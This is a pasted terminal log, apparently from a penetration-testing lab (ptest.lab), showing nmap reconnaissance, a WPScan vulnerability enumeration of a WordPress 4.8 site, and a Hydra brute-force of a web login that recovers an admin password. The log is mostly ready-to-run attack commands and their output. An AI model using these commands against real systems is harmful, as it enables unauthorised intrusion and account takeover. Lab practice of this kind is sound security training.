Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@kapirotohat:~# nmap -sS -A -n 192.168.101.10-11
- Starting Nmap 7.40 ( https://nmap.org ) at 2017-10-09 21:52 -03
- Nmap scan report for 192.168.101.10
- Host is up (0.73s latency).
- Not shown: 996 filtered ports
- PORT STATE SERVICE VERSION
- 25/tcp open smtp Postfix smtpd
- |_smtp-commands: SMTP: EHLO 220 mail.ptest.lab ESMTP Postfix (Debian/GNU)\x0D
- 80/tcp open http nginx 1.12.1
- |_http-title: 403 Forbidden
- 88/tcp open hadoop-datanode Apache Hadoop 1.6.2
- | hadoop-datanode-info:
- |_ Logs: login-header
- |_hadoop-jobtracker-info:
- | hadoop-tasktracker-info:
- |_ Logs: login-header
- |_hbase-master-info:
- | http-robots.txt: 1 disallowed entry
- |_/
- |_http-server-header: nginx/1.6.2
- |_http-title: Users
- 8080/tcp open http nginx
- | http-robots.txt: 1 disallowed entry
- |_/
- |_http-server-header: nginx
- |_http-title: Site doesn't have a title (text/html).
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: specialized|WAP|general purpose|printer|webcam
- Running (JUST GUESSING): Crestron 2-Series (88%), Asus embedded (86%), Linux 3.X|2.6.X (86%), HP embedded (86%), AXIS embedded (85%)
- OS CPE: cpe:/o:crestron:2_series cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel:3.1 cpe:/o:linux:linux_kernel:2.6.17 cpe:/h:axis:210a_network_camera cpe:/h:axis:211_network_camera
- Aggressive OS guesses: Crestron XPanel control system (88%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), HP PSC 2400-series Photosmart printer (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (85%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 3 hops
- Service Info: Host: -mail.ptest.lab
- TRACEROUTE (using port 25/tcp)
- HOP RTT ADDRESS
- - Hops 1-2 are the same as for 192.168.101.11
- 3 758.72 ms 192.168.101.10
- Nmap scan report for 192.168.101.11
- Host is up (0.72s latency).
- Not shown: 999 filtered ports
- PORT STATE SERVICE VERSION
- 2222/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
- | ssh-hostkey:
- |_ 1024 50:f9:23:6f:7e:3f:bb:68:77:5e:44:99:4d:51:9b:92 (DSA)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: specialized|WAP|general purpose|printer|webcam
- Running (JUST GUESSING): Crestron 2-Series (88%), Asus embedded (86%), Linux 3.X|2.6.X (86%), HP embedded (86%), AXIS embedded (85%)
- OS CPE: cpe:/o:crestron:2_series cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel:3.1 cpe:/o:linux:linux_kernel:2.6.17 cpe:/h:axis:210a_network_camera cpe:/h:axis:211_network_camera
- Aggressive OS guesses: Crestron XPanel control system (88%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), HP PSC 2400-series Photosmart printer (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (85%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 3 hops
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- TRACEROUTE (using port 2222/tcp)
- HOP RTT ADDRESS
- 1 758.28 ms 10.10.0.1
- 2 758.55 ms 172.0.1.1
- 3 760.72 ms 192.168.101.11
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 2 IP addresses (2 hosts up) scanned in 204.82 seconds
- root@kapirotohat:~# wpscan -a "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" -u 192.168.101.10
- _______________________________________________________________
- __ _______ _____
- \ \ / / __ \ / ____|
- \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
- \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
- \ /\ / | | ____) | (__| (_| | | | |
- \/ \/ |_| |_____/ \___|\__,_|_| |_|
- WordPress Security Scanner by the WPScan Team
- Version 2.9.2
- Sponsored by Sucuri - https://sucuri.net
- @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
- _______________________________________________________________
- [+] URL: http://192.168.101.10/
- [+] Started: Mon Oct 9 21:58:39 2017
- [!] The WordPress 'http://192.168.101.10/readme.html' file exists exposing a version number
- [+] WordPress version 4.8 (Released on 2017-06-08) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
- [!] 7 vulnerabilities identified from the version number
- [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
- Reference: https://wpvulndb.com/vulnerabilities/8905
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
- Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
- [i] Fixed in: 4.8.2
- [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
- Reference: https://wpvulndb.com/vulnerabilities/8910
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41398
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
- [i] Fixed in: 4.8.2
- [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
- Reference: https://wpvulndb.com/vulnerabilities/8911
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41457
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
- [i] Fixed in: 4.8.2
- [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer
- Reference: https://wpvulndb.com/vulnerabilities/8912
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41397
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722
- [i] Fixed in: 4.8.2
- [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
- Reference: https://wpvulndb.com/vulnerabilities/8913
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41448
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
- [i] Fixed in: 4.8.2
- [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
- Reference: https://wpvulndb.com/vulnerabilities/8914
- Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- Reference: https://core.trac.wordpress.org/changeset/41395
- Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
- [i] Fixed in: 4.8.2
- [!] Title: WordPress 2.3-4.8.2 - Host Header Injection in Password Reset
- Reference: https://wpvulndb.com/vulnerabilities/8807
- Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
- Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
- Reference: https://core.trac.wordpress.org/ticket/25239
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
- [+] WordPress theme in use: twentyseventeen - v1.3
- [+] Name: twentyseventeen - v1.3
- | Latest version: 1.3 (up to date)
- | Location: http://192.168.101.10/wp-content/themes/twentyseventeen/
- | Readme: http://192.168.101.10/wp-content/themes/twentyseventeen/README.txt
- | Style URL: http://192.168.101.10/wp-content/themes/twentyseventeen/style.css
- | Theme Name: Twenty Seventeen
- | Theme URI: https://wordpress.org/themes/twentyseventeen/
- | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
- | Author: the WordPress team
- | Author URI: https://wordpress.org/
- [+] Enumerating plugins from passive detection ...
- | 1 plugin found:
- [+] Name: kittycatfish-2.2 - v2.2
- | Location: http://192.168.101.10/wp-content/plugins/kittycatfish-2.2/
- | Readme: http://192.168.101.10/wp-content/plugins/kittycatfish-2.2/readme.txt
- [+] Finished: Mon Oct 9 22:01:21 2017
- [+] Requests Done: 63
- [+] Memory used: 63.863 MB
- [+] Elapsed time: 00:02:41
- root@kapirotohat:~# hydra 192.168.101.10 -s 88 http-form-post "/index.php?module=Users&action=Login:__vtrftk=sid%3A1d24833a22417d1d4e19be2c43ff5021e2ff5a5a%2C1500076613&username=^USER^&password=^PASS^:Invalid username or password." -l admin -P '/root/Área de trabalho/backup kapiroto/WORDLIST/letrasminus.txt' -t 20 -o crm.txt
- Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-09 22:37:52
- [ERROR] Maximum number of passwords is 50000000, this file has 308915777 entries.
- root@kapirotohat:~# cd /root/Área\ de\ trabalho/backup\ kapiroto/WORDLIST/
- root@kapirotohat:~/Área de trabalho/backup kapiroto/WORDLIST# ls
- azmaiu.txt letrasminus.txt nume.txt
- root@kapirotohat:~/Área de trabalho/backup kapiroto/WORDLIST# split --lines 5000000 letrasminus.txt
- root@kapirotohat:~/Área de trabalho/backup kapiroto/WORDLIST# hydra 192.168.101.10 -s 88 http-form-post "/index.php?module=Users&action=Login:__vtrftk=sid%3A1d24833a22417d1d4e19be2c43ff5021e2ff5a5a%2C1500076613&username=^USER^&password=^PASS^:Invalid username or password." -l admin -P '/root/Área de trabalho/backup kapiroto/WORDLIST/xbl' -t 20 -o crm.txt
- Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-09 23:16:42
- [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
- [DATA] max 20 tasks per 1 server, overall 64 tasks, 4999999 login tries (l:1/p:4999999), ~3906 tries per task
- [DATA] attacking service http-post-form on port 88
- [STATUS] 149.00 tries/min, 149 tries in 00:01h, 4999850 to do in 559:17h, 20 active
- [STATUS] 147.33 tries/min, 442 tries in 00:03h, 4999557 to do in 565:34h, 20 active
- [STATUS] 147.29 tries/min, 1031 tries in 00:07h, 4998968 to do in 565:41h, 20 active
- [88][http-post-form] host: 192.168.101.10 login: admin password: blackstar
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-09 23:29:05
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement